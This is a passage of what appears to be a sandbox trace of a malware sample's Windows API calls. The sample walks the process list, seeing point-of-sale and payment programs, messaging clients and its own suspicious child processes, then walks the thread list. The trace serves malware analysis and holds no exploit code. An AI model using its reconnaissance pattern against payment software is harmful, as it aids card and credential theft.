th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0096.587] GetTickCount () returned 0x11f0636 [0096.587] GetCurrentThreadId () returned 0x42c [0096.587] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.587] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.587] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0096.588] GetTickCount () returned 0x11f0645 [0096.588] GetCurrentThreadId () returned 0x42c [0096.588] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.588] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.588] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0096.589] GetTickCount () returned 0x11f0645 [0096.590] GetCurrentThreadId () returned 0x42c [0096.590] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.590] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.590] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0096.591] GetTickCount () returned 0x11f0645 [0096.591] GetCurrentThreadId () returned 0x42c [0096.591] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.591] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.591] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0096.592] GetTickCount () returned 0x11f0645 [0096.592] GetCurrentThreadId () returned 0x42c [0096.592] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.592] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.592] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0096.594] GetTickCount () returned 0x11f0645 [0096.594] GetCurrentThreadId () returned 0x42c [0096.594] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.594] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.594] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0096.595] GetTickCount () returned 0x11f0645 [0096.595] GetCurrentThreadId () returned 0x42c [0096.595] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.595] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.595] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0096.596] GetTickCount () returned 0x11f0645 [0096.596] GetCurrentThreadId () returned 0x42c [0096.596] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.596] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.596] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0096.598] GetTickCount () returned 0x11f0645 [0096.598] GetCurrentThreadId () returned 0x42c [0096.598] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.598] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.598] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0096.599] GetTickCount () returned 0x11f0645 [0096.599] GetCurrentThreadId () returned 0x42c [0096.599] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.599] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.599] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0096.600] GetTickCount () returned 0x11f0645 [0096.600] GetCurrentThreadId () returned 0x42c [0096.601] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.601] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.601] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0096.602] GetTickCount () returned 0x11f0645 [0096.602] GetCurrentThreadId () returned 0x42c [0096.602] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.602] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.602] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xab8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0096.603] GetTickCount () returned 0x11f0655 [0096.603] GetCurrentThreadId () returned 0x42c [0096.603] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.603] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.604] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0096.605] GetTickCount () returned 0x11f0655 [0096.605] GetCurrentThreadId () returned 0x42c [0096.605] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.605] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.605] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0096.606] GetTickCount () returned 0x11f0655 [0096.606] GetCurrentThreadId () returned 0x42c [0096.606] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.606] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.606] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0096.607] GetTickCount () returned 0x11f0655 [0096.607] GetCurrentThreadId () returned 0x42c [0096.607] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.607] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.607] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0096.608] GetTickCount () returned 0x11f0655 [0096.608] GetCurrentThreadId () returned 0x42c [0096.608] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.609] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.609] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0096.610] GetTickCount () returned 0x11f0655 [0096.610] GetCurrentThreadId () returned 0x42c [0096.610] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.611] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.611] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0096.612] GetTickCount () returned 0x11f0655 [0096.612] GetCurrentThreadId () returned 0x42c [0096.612] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.612] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.612] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0096.613] GetTickCount () returned 0x11f0655 [0096.613] GetCurrentThreadId () returned 0x42c [0096.613] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.613] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.613] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0096.614] GetTickCount () returned 0x11f0655 [0096.614] GetCurrentThreadId () returned 0x42c [0096.614] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.614] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.614] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="church.exe")) returned 1 [0096.615] GetTickCount () returned 0x11f0655 [0096.615] GetCurrentThreadId () returned 0x42c [0096.615] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.615] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.615] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x444, pcPriClassBase=8, dwFlags=0x0, szExeFile="commonwealth.exe")) returned 1 [0096.616] GetTickCount () returned 0x11f0655 [0096.616] GetCurrentThreadId () returned 0x42c [0096.616] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.616] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.616] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0096.617] GetTickCount () returned 0x11f0655 [0096.617] GetCurrentThreadId () returned 0x42c [0096.617] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.617] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.617] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0096.618] GetTickCount () returned 0x11f0655 [0096.618] GetCurrentThreadId () returned 0x42c [0096.618] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.618] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.618] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0xb04, pcPriClassBase=13, dwFlags=0x0, szExeFile="243E.TMP.EXE.DEL105265203.DEL105731312.exe")) returned 1 [0096.620] GetTickCount () returned 0x11f0664 [0096.620] GetCurrentThreadId () returned 0x42c [0096.620] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.620] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.620] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x778, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6f8, pcPriClassBase=8, dwFlags=0x0, szExeFile="updatewin.exe")) returned 1 [0096.621] GetTickCount () returned 0x11f0664 [0096.621] GetCurrentThreadId () returned 0x42c [0096.621] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.621] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.621] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x6f8, pcPriClassBase=8, dwFlags=0x0, szExeFile="5.exe")) returned 1 [0096.622] GetTickCount () returned 0x11f0664 [0096.622] GetCurrentThreadId () returned 0x42c [0096.622] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.622] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.622] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x868, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x758, pcPriClassBase=8, dwFlags=0x0, szExeFile="updatewin1.exe")) returned 1 [0096.623] GetTickCount () returned 0x11f0664 [0096.623] GetCurrentThreadId () returned 0x42c [0096.623] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.623] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.623] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x868, pcPriClassBase=8, dwFlags=0x0, szExeFile="powershell.exe")) returned 1 [0096.624] GetTickCount () returned 0x11f0664 [0096.624] GetCurrentThreadId () returned 0x42c [0096.624] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.624] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.624] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0096.625] GetTickCount () returned 0x11f0664 [0096.625] GetCurrentThreadId () returned 0x42c [0096.625] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.625] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.625] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x370, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0096.626] GetTickCount () returned 0x11f0664 [0096.626] GetCurrentThreadId () returned 0x42c [0096.626] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.626] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.626] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x92c, pcPriClassBase=6, dwFlags=0x0, szExeFile="243E.TMP.EXE.DEL105265203.DEL105731312.exe")) returned 1 [0096.627] GetTickCount () returned 0x11f0664 [0096.627] GetCurrentThreadId () returned 0x42c [0096.627] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.627] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.627] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1ac, pcPriClassBase=13, dwFlags=0x0, szExeFile="LogonUI.exe")) returned 1 [0096.628] GetTickCount () returned 0x11f0664 [0096.628] GetCurrentThreadId () returned 0x42c [0096.628] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.628] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.628] Process32Next (in: hSnapshot=0x6b4, lppe=0x9e2f258 | out: lppe=0x9e2f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1ac, pcPriClassBase=13, dwFlags=0x0, szExeFile="LogonUI.exe")) returned 0 [0096.629] GetTickCount () returned 0x11f0664 [0096.629] Thread32First (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.630] GetCurrentThreadId () returned 0x42c [0096.630] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.630] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.630] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.631] GetTickCount () returned 0x11f0664 [0096.631] GetCurrentThreadId () returned 0x42c [0096.631] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.631] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.631] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.632] GetTickCount () returned 0x11f0664 [0096.632] GetCurrentThreadId () returned 0x42c [0096.632] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.632] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.632] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.633] GetTickCount () returned 0x11f0664 [0096.633] GetCurrentThreadId () returned 0x42c [0096.633] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.633] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.633] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.634] GetTickCount () returned 0x11f0674 [0096.634] GetCurrentThreadId () returned 0x42c [0096.634] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.634] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.635] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.635] GetTickCount () returned 0x11f0674 [0096.635] GetCurrentThreadId () returned 0x42c [0096.635] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.636] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.636] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.636] GetTickCount () returned 0x11f0674 [0096.636] GetCurrentThreadId () returned 0x42c [0096.637] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.637] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.637] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.637] GetTickCount () returned 0x11f0674 [0096.638] GetCurrentThreadId () returned 0x42c [0096.638] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.638] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.638] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.639] GetTickCount () returned 0x11f0674 [0096.639] GetCurrentThreadId () returned 0x42c [0096.639] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.639] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.639] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.640] GetTickCount () returned 0x11f0674 [0096.640] GetCurrentThreadId () returned 0x42c [0096.640] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.640] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.640] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.641] GetTickCount () returned 0x11f0674 [0096.641] GetCurrentThreadId () returned 0x42c [0096.641] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.641] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.641] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.642] GetTickCount () returned 0x11f0674 [0096.642] GetCurrentThreadId () returned 0x42c [0096.642] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.642] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.642] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.643] GetTickCount () returned 0x11f0674 [0096.643] GetCurrentThreadId () returned 0x42c [0096.643] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.643] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.643] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.644] GetTickCount () returned 0x11f0674 [0096.644] GetCurrentThreadId () returned 0x42c [0096.644] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.644] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.644] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.645] GetTickCount () returned 0x11f0674 [0096.645] GetCurrentThreadId () returned 0x42c [0096.645] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.645] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.645] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.646] GetTickCount () returned 0x11f0674 [0096.646] GetCurrentThreadId () returned 0x42c [0096.646] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0096.646] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0096.646] Thread32Next (hSnapshot=0x6b4, lpte=0x9e2f434) returned 1 [0096.647] GetTickCount () 